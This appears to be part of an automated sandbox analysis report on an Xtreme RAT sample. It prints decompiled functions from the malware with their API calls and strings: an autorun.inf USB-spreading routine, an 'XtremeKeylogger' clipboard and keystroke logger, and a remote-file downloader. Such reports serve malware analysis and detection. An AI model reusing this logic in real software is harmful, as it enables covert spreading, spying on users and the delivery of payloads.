Instruction Fuzzy Hash: 2C814D74A00259AFFB10DFA8CC85FEE77F9FB08380F508119F544A72A9CB75A9458B64

Uniqueness

Uniqueness Score: -1.00%

Function 1000A558, Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 279
libraryfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E1000A558(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr* _v12;
				char _v13;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v2520;
				intOrPtr _v2524;
				char _v4964;
				void _v5044;
				char _v5048;
				char _v5052;
				char _v5056;
				intOrPtr _v5060;
				char _v5064;
				char _v5068;
				char _v5072;
				char _v5076;
				char _v5080;
				char _v5084;
				char _v5088;
				void* _t115;
				void* _t154;
				void* _t159;
				intOrPtr _t169;
				void* _t189;
				void* _t194;
				void* _t218;
				WCHAR* _t230;
				char* _t231;
				intOrPtr _t233;
				intOrPtr* _t237;
				char _t251;
				intOrPtr _t254;
				void* _t264;
				char* _t265;
				char _t278;
				void* _t279;
				char* _t280;
				intOrPtr _t296;
				void* _t298;
				intOrPtr* _t299;
				void* _t301;
				void* _t302;

				_t251 = __edx;
				_t301 = _t302;
				_t233 = 0x27b;
				do {
					_push(0);
					_push(0);
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_t1 =  &_v8;
				 *_t1 = _t233;
				_push(__ebx);
				_t298 = __eax;
				_push( *_t1);
				memcpy( &_v5044, __eax, 0x4e4 << 2);
				_pop(_t237);
				_v12 = _t237;
				_v8 = _t251;
				E10003C28( &_v8);
				_push(_t301);
				_push(0x1000a98b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t302 + 0xc;
				E10003770(_v12);
				LoadLibraryA("URLMON.DLL");
				LoadLibraryA("shell32.dll");
				E100037D0( &_v24, L"XTREME");
				_v13 = 0;
				_t230 = E1000390C(_v8);
				_t115 = E10005CA4(_t230);
				_t306 = _t115;
				if(_t115 == 0) {
					L8:
					_t296 = 0x14;
					_t231 =  &_v4964;
					_t299 =  &_v5044;
					do {
						E100034B0( &_v5052, 0x3d, _t231);
						__eflags = _v5052;
						if(_v5052 != 0) {
							__eflags =  *_t299;
							if( *_t299 > 0) {
								_push("http://");
								E100034B0( &_v5064, 0x3d, _t231);
								_push(_v5064);
								_push(0x1000aa2c);
								E100035A0();
								_t260 = _v5060;
								E100038FC( &_v5056, _v5060);
								_push(_v5056);
								asm("cdq");
								E10005CCC( &_v5068, 0x3d, _v5060,  *_t299, _t260);
								_push(_v5068);
								_push(0x1000aa34);
								E10005CCC( &_v5072, 0x3d, _t260, _v2524, _v2520);
								_push(_v5072);
								_push(L".functions");
								E100039EC();
								E10003898( &_v5076, E1000390C(_v8));
								_push(_v5076);
								E10003898( &_v5080, E1000390C(_v20));
								_pop(_t264);
								_t154 = E10005F88(_v5080, _t231, _t264);
								__eflags = _t154 - 1;
								if(_t154 != 1) {
									DeleteFileW(E1000390C(_v8));
								} else {
									_t159 = E1000390C(_v8);
									_t265 =  &_v28;
									_v36 = E10005E30(_t159, _t265);
									_v32 = _t265;
									__eflags = _v32;
									if(__eflags != 0) {
										if(__eflags > 0) {
											goto L16;
										}
									} else {
										__eflags = _v36;
										if(_v36 > 0) {
											L16:
											E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
											E100050D0(E1000390C(_v20), _v28);
											_t169 = E10003B94(L"STARTSERVERBUFFER", _v20);
											__eflags = _t169;
											if(_t169 > 0) {
												__eflags = E10003B94(L"ENDSERVERBUFFER", _v20);
												if(__eflags > 0) {
													E10003B04( &_v20, 0x11, 1, __eflags);
													E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, __eflags);
													E10006234(_v20, _t231,  &_v5084, _v24, _t299, __eflags);
													E100037AC(_v12, _v5084);
													_push(L"STARTSERVERBUFFER");
													_push( *_v12);
													_push(L"ENDSERVERBUFFER");
													E100039EC();
													E10006234(_v20, _t231,  &_v5088, _v24, _t299, __eflags);
													_t278 = _v5088;
													E100037D0( &_v20, _t278);
													_t189 = E1000391C(_v20);
													asm("cdq");
													_push(_t278);
													_push(_t189 + _t189);
													_push(E1000390C(_v20));
													_t194 = E1000390C(_v8);
													_pop(_t279);
													E10005EB4(_t194, _t279);
													E10005F1C(_v8, _t231,  &_v5088, _t299);
													_v13 = 1;
												}
											}
										}
									}
								}
							}
						}
						_t299 = _t299 + 4;
						_t231 = _t231 + 0x7a;
						_t296 = _t296 - 1;
						__eflags = _t296;
					} while (_t296 != 0);
				} else {
					SetFileAttributesW(_t230, 0x80);
					_t280 =  &_v28;
					_v36 = E10005E30(_t230, _t280);
					_v32 = _t280;
					E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
					E100050D0(E1000390C(_v20), _v28);
					E10006234(_v20, _t230,  &_v5048, _v24, _t298, _t306);
					E100037D0( &_v20, _v5048);
					if(E10003B94(L"STARTSERVERBUFFER", _v20) <= 0) {
						L7:
						DeleteFileW(E1000390C(_v8));
						goto L8;
					} else {
						_t218 = E10003B94(L"ENDSERVERBUFFER", _v20);
						_t308 = _t218;
						if(_t218 <= 0) {
							goto L7;
						} else {
							E10005F1C(_v8, _t230,  &_v5048, _t298);
							E10003B04( &_v20, 0x11, 1, _t308);
							E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, _t308);
							E100037AC(_v12, _v20);
							_v13 = 1;
						}
					}
				}
				_pop(_t254);
				 *[fs:eax] = _t254;
				_push(E1000A992);
				E10003788( &_v5088, 6);
				E100032F0( &_v5064, 2);
				E10003770( &_v5056);
				E100032CC( &_v5052);
				E10003770( &_v5048);
				E10003788( &_v24, 2);
				return E10003770( &_v8);
			}

0x1000a558
0x1000a559
0x1000a55c
0x1000a561
0x1000a561
0x1000a563
0x1000a565
0x1000a565
0x1000a568
0x1000a568
0x1000a56b
0x1000a56e
0x1000a576
0x1000a57c
0x1000a57e
0x1000a57f
0x1000a582
0x1000a588
0x1000a58f
0x1000a590
0x1000a595
0x1000a598
0x1000a59e
0x1000a5a8
0x1000a5b2
0x1000a5bf
0x1000a5c4
0x1000a5d0
0x1000a5d4
0x1000a5d9
0x1000a5db
0x1000a6bf
0x1000a6bf
0x1000a6c4
0x1000a6ca
0x1000a6d0
0x1000a6dd
0x1000a6e2
0x1000a6e9
0x1000a6ef
0x1000a6f2
0x1000a6f8
0x1000a70a
0x1000a70f
0x1000a715
0x1000a725
0x1000a72a
0x1000a736
0x1000a73b
0x1000a743
0x1000a74c
0x1000a751
0x1000a757
0x1000a76e
0x1000a773
0x1000a779
0x1000a786
0x1000a79b
0x1000a7a6
0x1000a7b7
0x1000a7c2
0x1000a7c3
0x1000a7c8
0x1000a7ca
0x1000a915
0x1000a7d0
0x1000a7d3
0x1000a7d8
0x1000a7e0
0x1000a7e3
0x1000a7e6
0x1000a7ea
0x1000a7f8
0x00000000
0x00000000
0x1000a7ec
0x1000a7ec
0x1000a7f0
0x1000a7fe
0x1000a812
0x1000a825
0x1000a832
0x1000a837
0x1000a839
0x1000a84c
0x1000a84e
0x1000a861
0x1000a87b
0x1000a88c
0x1000a89a
0x1000a89f
0x1000a8a7
0x1000a8a9
0x1000a8b6
0x1000a8c7
0x1000a8cc
0x1000a8d5
0x1000a8dd
0x1000a8e4
0x1000a8e5
0x1000a8e6
0x1000a8ef
0x1000a8f3
0x1000a8f8
0x1000a8f9
0x1000a901
0x1000a906
0x1000a906
0x1000a84e
0x1000a839
0x1000a7f0
0x1000a7ea
0x1000a7ca
0x1000a6f2
0x1000a91a
0x1000a91d
0x1000a920
0x1000a920
0x1000a920
0x1000a5e1
0x1000a5e7
0x1000a5ee
0x1000a5f6
0x1000a5f9
0x1000a610
0x1000a623
0x1000a634
0x1000a642
0x1000a656
0x1000a6b1
0x1000a6ba
0x00000000
0x1000a658
0x1000a660
0x1000a665
0x1000a667
0x00000000
0x1000a669
0x1000a66c
0x1000a67e
0x1000a698
0x1000a6a3
0x1000a6a8
0x1000a6a8
0x1000a667
0x1000a656
0x1000a929
0x1000a92c
0x1000a92f
0x1000a93f
0x1000a94f
0x1000a95a
0x1000a965
0x1000a970
0x1000a97d
0x1000a98a

APIs

LoadLibraryA.KERNEL32(URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5A8
LoadLibraryA.KERNEL32(shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5B2
SetFileAttributesW.KERNEL32(00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5E7
DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A6BA

Part of subcall function 10005F88: URLDownloadToCacheFileW.URLMON(00000000,00000000,?,00000104,00000010,00000000), ref: 10005FD1
Part of subcall function 10005F88: CopyFileW.KERNEL32(?,00000000,00000000,00000000,10006016), ref: 10005FEC

DeleteFileW.KERNEL32(00000000,.functions,?,1000AA34,?,?,1000AA2C,?,http://), ref: 1000A915

Part of subcall function 10005E30: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E67
Part of subcall function 10005E30: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E71
Part of subcall function 10005E30: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E99
Part of subcall function 10005E30: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E9F

Strings

.functions, xrefs: 1000A779
URLMON.DLL, xrefs: 1000A5A3
http://, xrefs: 1000A6F8
shell32.dll, xrefs: 1000A5AD
ENDSERVERBUFFER, xrefs: 1000A65B, 1000A842, 1000A8A9
XTREME, xrefs: 1000A5BA
STARTSERVERBUFFER, xrefs: 1000A64A, 1000A82D, 1000A89F

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$DeleteLibraryLoad$AttributesCacheCloseCopyCreateDownloadHandleReadSize
String ID: .functions$ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$http://$shell32.dll
API String ID: 1556940775-4263465085
Opcode ID: 4ee3fca3fa4ba668606f9b885bd85ae8f743085f3bd6b7371585acf1e6052cfe
Instruction ID: 095f8cd7e1ad7f54d17a8aaba90678f4abf6843293fa25502bb1c2560b129c41
Opcode Fuzzy Hash: 4ee3fca3fa4ba668606f9b885bd85ae8f743085f3bd6b7371585acf1e6052cfe
Instruction Fuzzy Hash: 3FB14D78A001199BEB11DBA4CC82ADFB7B9FF44380F5081A5F504A765ADB74AF858F50

Uniqueness

Uniqueness Score: -1.00%

Function 1000B0D0, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 177
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000B0D0(intOrPtr* __eax, void* __ebx, void* __ecx, signed int __edx, signed int __esi) {
				void* _v1;
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				signed char _t60;
				signed char _t61;
				signed char _t62;
				signed char _t63;
				void* _t71;
				WCHAR* _t80;
				void* _t93;
				void* _t99;
				signed char _t118;
				intOrPtr _t121;
				intOrPtr _t134;
				void* _t143;
				void* _t149;
				signed int _t151;
				intOrPtr _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t60 = __eax +  *__eax;
				 *_t60 =  *_t60 + _t60;
				_pop(_t153);
				 *_t60 =  *_t60 + _t60;
				 *((intOrPtr*)(__ecx + __esi * 4)) =  *((intOrPtr*)(__ecx + __esi * 4)) + _t60;
				 *_t60 =  *_t60 + __edx;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				_t61 = _t60 & 0x000000b1;
				 *_t61 =  *_t61 + __edx;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				 *_t61 =  *_t61 + _t61;
				asm("adc [eax], cl");
				 *_t61 =  *_t61 + _t61;
				 *((intOrPtr*)(_t61 + __edx)) =  *((intOrPtr*)(_t61 + __edx)) + __ebx;
				 *_t61 =  *_t61 + __edx;
				asm("clc");
				 *_t61 =  *_t61 - _t61;
				asm("adc [edx+ebp], al");
				 *_t61 =  *_t61 + __edx;
				 *_t61 =  *_t61 + __edx;
				_t62 = _t61 | 0x0000002a;
				 *_t62 =  *_t62 + __edx;
				 *__edx =  *__edx;
				 *_t62 =  *_t62 + __edx;
				asm("fsubr qword [eax]");
				 *_t62 =  *_t62 + __edx;
				asm("clc");
				 *_t62 =  *_t62 - _t62;
				asm("adc [ecx+ebp], dh");
				 *_t62 =  *_t62 + __edx;
				_push(cs);
				 *_t62 =  *_t62 + _t62;
				 *_t62 =  *_t62 + _t62;
				 *0 =  *0 + _t62;
				 *_t62 =  *_t62 + _t62;
				 *((intOrPtr*)(_t62 + __edx)) =  *((intOrPtr*)(_t62 + __edx));
				 *_t62 =  *_t62 + __edx;
				_t63 = _t62;
				 *_t63 =  *_t63 + _t63;
				 *(_t149 + 0x53 + __edx * 2) =  *(_t149 + 0x53 + __edx * 2) | __edx;
				asm("popad");
				_t151 =  *(__esi - 0x70) * 0x51ec8b55;
				_push(_t151);
				_t152 = _t153;
				_push(0);
				_t121 = 6;
				do {
					_push(0);
					_push(0);
					_t121 = _t121 - 1;
					_t155 = _t121;
				} while (_t121 != 0);
				_t16 =  &_v8;
				 *_t16 = _t121;
				_push(__ebx);
				_v8 =  *_t16;
				_t118 = _t63;
				E10003C28( &_v8);
				_push(_t152);
				_push(0x1000b2fa);
				 *[fs:eax] = _t153;
				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t155);
				_t71 = E10005690(E1000390C(_v12),  *[fs:eax]);
				_t156 = _t71;
				if(_t71 != 0) {
					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
					_t126 = _v24;
					E10003988( &_v20, _v24, _v12, _t156);
					_t80 = E1000390C(_v20);
					CopyFileW(E1000390C( *((intOrPtr*)(_t118 + 4))), _t80, 0);
					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _v24,  &_v28);
					_push(_v28);
					_push(0x1000b418);
					_push(L"icon=shell32.dll,4");
					_push(0x1000b418);
					_push(L"shellexecute=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _v24,  &_v32);
					_push(_v32);
					_push(0x1000b418);
					_push(L"label=PENDRIVE");
					_push(0x1000b418);
					_push(L"action=Open folder to view files");
					_push(0x1000b418);
					_push(L"shell\\Open=Open");
					_push(0x1000b418);
					_push(L"shell\\Open\\command=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _t126,  &_v36);
					_push(_v36);
					_push(0x1000b418);
					_push(L"shell\\Open\\Default=1");
					E100039EC();
					_t93 = E1000391C(_v16) + _t92;
					_t157 = _t93;
					asm("cdq");
					_push(0x14);
					_push(_t93);
					_push(E1000390C(_v16));
					E10003988( &_v40, L"autorun.inf", _v8, _t93);
					_t99 = E1000390C(_v40);
					_pop(_t143);
					E10005EB4(_t99, _t143);
					E10003988( &_v44, L"autorun.inf", _v8, _t93);
					E10005F1C(_v44, _t118, L"autorun.inf", __esi);
					_t129 = L"RECYCLER\\";
					E10003988( &_v48, L"RECYCLER\\", _v8, _t93);
					E10005F1C(_v48, _t118, L"RECYCLER\\", __esi);
					E10005F1C(_v12, _t118, L"RECYCLER\\", __esi);
					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _t129,  &_v56);
					E10003988( &_v52, _v56, _v12, _t157);
					E10005F1C(_v52, _t118, _v56, _t148);
				}
				_pop(_t134);
				 *[fs:eax] = _t134;
				_push(E1000B301);
				return E10003788( &_v56, 0xd);
			}

0x1000b0d0
0x1000b0d0
0x1000b0d2
0x1000b0d4
0x1000b0d5
0x1000b0d7
0x1000b0da
0x1000b0dc
0x1000b0de
0x1000b0e0
0x1000b0e2
0x1000b0e4
0x1000b0e6
0x1000b0e8
0x1000b0ea
0x1000b0ec
0x1000b0ee
0x1000b0f0
0x1000b0f2
0x1000b0f4
0x1000b0f6
0x1000b0fb
0x1000b0fd
0x1000b0ff
0x1000b102
0x1000b104
0x1000b105
0x1000b107
0x1000b10a
0x1000b10e
0x1000b110
0x1000b112
0x1000b114
0x1000b116
0x1000b118
0x1000b11a
0x1000b11c
0x1000b11d
0x1000b11f
0x1000b122
0x1000b124
0x1000b125
0x1000b127
0x1000b129
0x1000b12b
0x1000b12d
0x1000b130
0x1000b132
0x1000b134
0x1000b136
0x1000b13c
0x1000b13d
0x1000b140
0x1000b141
0x1000b143
0x1000b144
0x1000b149
0x1000b149
0x1000b14b
0x1000b14d
0x1000b14d
0x1000b14d
0x1000b150
0x1000b150
0x1000b153
0x1000b154
0x1000b157
0x1000b15c
0x1000b163
0x1000b164
0x1000b16c
0x1000b17a
0x1000b187
0x1000b18c
0x1000b18e
0x1000b19c
0x1000b1a1
0x1000b1aa
0x1000b1b2
0x1000b1c1
0x1000b1c6
0x1000b1d1
0x1000b1d6
0x1000b1d9
0x1000b1de
0x1000b1e3
0x1000b1e8
0x1000b1ed
0x1000b1f8
0x1000b1fd
0x1000b200
0x1000b205
0x1000b20a
0x1000b20f
0x1000b214
0x1000b219
0x1000b21e
0x1000b223
0x1000b228
0x1000b233
0x1000b238
0x1000b23b
0x1000b240
0x1000b24d
0x1000b25a
0x1000b25a
0x1000b25c
0x1000b25d
0x1000b25e
0x1000b267
0x1000b273
0x1000b27b
0x1000b280
0x1000b281
0x1000b291
0x1000b299
0x1000b2a1
0x1000b2a9
0x1000b2b1
0x1000b2b9
0x1000b2c4
0x1000b2d2
0x1000b2da
0x1000b2da
0x1000b2e1
0x1000b2e4
0x1000b2e7
0x1000b2f9

APIs

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,1000B2FA,?,?,00000000,00000000), ref: 1000B1C1

Part of subcall function 10005F1C: GetFileAttributesW.KERNEL32(00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?,?,.dat), ref: 10005F46
Part of subcall function 10005F1C: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?), ref: 10005F58

Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B

Strings

shell\Open\Default=1, xrefs: 1000B240
icon=shell32.dll,4, xrefs: 1000B1DE
shell\Open=Open, xrefs: 1000B219
RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B172, 1000B1ED, 1000B228
shell\Open\command=, xrefs: 1000B223
[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B1C6
shellexecute=, xrefs: 1000B1E8
label=PENDRIVE, xrefs: 1000B205
action=Open folder to view files, xrefs: 1000B20F
RECYCLER\, xrefs: 1000B2A1
autorun.inf, xrefs: 1000B26B, 1000B289

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Attributes$CopyFreeString
String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
API String ID: 1359780422-631342129
Opcode ID: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
Instruction ID: e38e5125926d32c1d26ff353fbb275c64c03e2d6fa0b8cc01eec99beb1e39287
Opcode Fuzzy Hash: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
Instruction Fuzzy Hash: CA616334909688AFEB03DF64CC519DEBF75DF46280B5580E6F040AB15BD774AE05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100093E4, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 138
filewindowclipboardCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E100093E4(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				intOrPtr _t13;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t27;
				void* _t30;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t41;
				void* _t44;
				long _t45;
				int _t46;
				void* _t47;
				void* _t61;
				intOrPtr _t66;
				char* _t69;
				intOrPtr _t70;
				int _t74;
				void* _t75;
				void* _t79;
				void* _t80;
				intOrPtr* _t83;

				_t80 = __esi;
				_t79 = __edi;
				_t61 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t83);
				_push(0x100095de);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				E10008D4C(0);
				E100037D0( &_v8, L"XtremeKeylogger");
				if( *0x1000f688 == 0) {
					_t62 = E1000390C(_v8);
					 *0x1000f688 = E10006510(_t58, 1, E10008568);
				}
				_t13 =  *0x1000f688; // 0x0
				ShowWindow(E1000662C(_t13), 0);
				_t69 = L"qualquercoisarsrsr";
				E100037AC(0x1000f6d0, _t69);
				_t18 =  *0x1000f684; // 0x0
				SetFileAttributesW(E1000390C(_t18), 0x80);
				_t21 =  *0x1000f684; // 0x0
				 *0x1000e0b8 = CreateFileW(E1000390C(_t21), 0xc0000000, 3, 0, 4, 0, 0);
				if( *0x1000e0b8 != 0xffffffff) {
					_t86 =  *0x1000f6c1 - 1;
					if( *0x1000f6c1 == 1) {
						 *0x1000f6c4 = E10006788(_t61, _t79, _t80, _t86);
						 *0x1000f6c8 = _t69;
						_t44 =  *0x1000e0b8; // 0x0
						_t45 = GetFileSize(_t44, 0);
						_push(0);
						_push(_t45);
						_t46 =  *0x1000f6c4; // 0x0
						_t74 =  *0x1000f6c8; // 0x0
						_t47 = E10003FB0(_t46, _t74, 2, 0);
						if(_t74 != _v40) {
							_pop(_t75);
							if(__eflags > 0) {
								goto L8;
							}
						} else {
							_t88 = _t47 -  *_t83;
							_pop(_t75);
							if(_t47 >  *_t83) {
								L8:
								 *0x1000f6c4 = 0;
								 *0x1000f6c8 = 0;
							}
						}
						E10006710( &_v12, _t62, _t75,  *0x1000f6c4,  *0x1000f6c8);
						_t66 =  *0x1000f6b4; // 0x0
						E10003988( &_v16, _t66, L"SOFTWARE\\", _t88);
						E1000577C(0x80000001, _t61, L"LastSize", _v16, _t80, _t88, 2, _v12);
					}
					_t27 =  *0x1000f684; // 0x0
					SetFileAttributesW(E1000390C(_t27), 7);
					_t30 =  *0x1000e0b8; // 0x0
					SetFilePointer(_t30, 0, 0, 2);
					_t32 =  *0x1000f698; // 0x0
					_t33 =  *0x1000f688; // 0x0
					SendMessageA(E1000662C(_t33), _t32, 0, 0);
					_t36 =  *0x1000f688; // 0x0
					SetClipboardViewer(E1000662C(_t36));
					if( *0x1000f6c1 == 1) {
						if( *0x1000e0b0 != 0) {
							_t41 =  *0x1000e0b0; // 0x0
							E10006768(_t41);
						}
						 *0x1000e0b0 = E10006744(E10009204, 0, 0);
					}
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E100095E5);
				return E10003788( &_v16, 3);
			}

0x100093e4
0x100093e4
0x100093e4
0x100093e7
0x100093e9
0x100093eb
0x100093ef
0x100093f0
0x100093f5
0x100093f8
0x100093fb
0x10009408
0x10009414
0x10009423
0x10009431
0x10009431
0x10009438
0x10009443
0x1000944d
0x10009452
0x1000945c
0x10009467
0x1000947b
0x1000948b
0x10009497
0x1000949d
0x100094a4
0x100094af
0x100094b5
0x100094bd
0x100094c3
0x100094ca
0x100094cb
0x100094d0
0x100094d6
0x100094dc
0x100094e5
0x100094f0
0x100094f2
0x00000000
0x00000000
0x100094e7
0x100094e7
0x100094ea
0x100094ec
0x100094f4
0x100094f4
0x100094fe
0x100094fe
0x100094ec
0x10009517
0x10009525
0x10009530
0x10009542
0x10009542
0x10009549
0x10009554
0x1000955f
0x10009565
0x1000956e
0x10009574
0x1000957f
0x10009584
0x1000958f
0x1000959b
0x100095a4
0x100095a6
0x100095ab
0x100095ab
0x100095be
0x100095be
0x1000959b
0x100095c5
0x100095c8
0x100095cb
0x100095dd

APIs

Part of subcall function 10008D4C: SendMessageA.USER32(00000000,0000C1BC,00000000,00000000), ref: 10008D6F
Part of subcall function 10008D4C: CloseHandle.KERNEL32(00000000,1000C6A4,?,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958), ref: 10008D83

ShowWindow.USER32(00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002,?,?), ref: 10009443
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002), ref: 10009467
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000), ref: 10009486
GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 100094C3
SetFileAttributesW.KERNEL32(00000000,00000007,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 10009554
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000007,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000), ref: 10009565
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 1000957F
SetClipboardViewer.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000007,00000000,C0000000,00000003,00000000,00000004), ref: 1000958F

Part of subcall function 10006510: GetDesktopWindow.USER32 ref: 10006571
Part of subcall function 10006510: GetWindowRect.USER32 ref: 10006577
Part of subcall function 10006510: GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?), ref: 1000657E
Part of subcall function 10006510: RegisterClassW.USER32 ref: 1000658A

Strings

LastSize, xrefs: 10009538
qualquercoisarsrsr, xrefs: 1000944D
SOFTWARE\, xrefs: 1000952B
XtremeKeylogger, xrefs: 10009403

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Window$AttributesHandleMessageSend$ClassClipboardCloseCreateDesktopModulePointerRectRegisterShowSizeViewer
String ID: LastSize$SOFTWARE\$XtremeKeylogger$qualquercoisarsrsr
API String ID: 411803610-193067991
Opcode ID: 676dcd07bedc78bc966ac9f8878885fe89c124370f656291f037c9e9c79c44c2
Instruction ID: e10228e688af51e092dac2c6f3dee7a218e45a64ed0b3a8379d93de067ea2b0a
Opcode Fuzzy Hash: 676dcd07bedc78bc966ac9f8878885fe89c124370f656291f037c9e9c79c44c2
Instruction Fuzzy Hash: 86415E78604251AFF711EB70CC92F6E37A9E7483C0F518029F144AB6FECEB6A8419751

Uniqueness

Uniqueness Score: -1.00%

Function 1000B140, Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 125
fileCOMMON

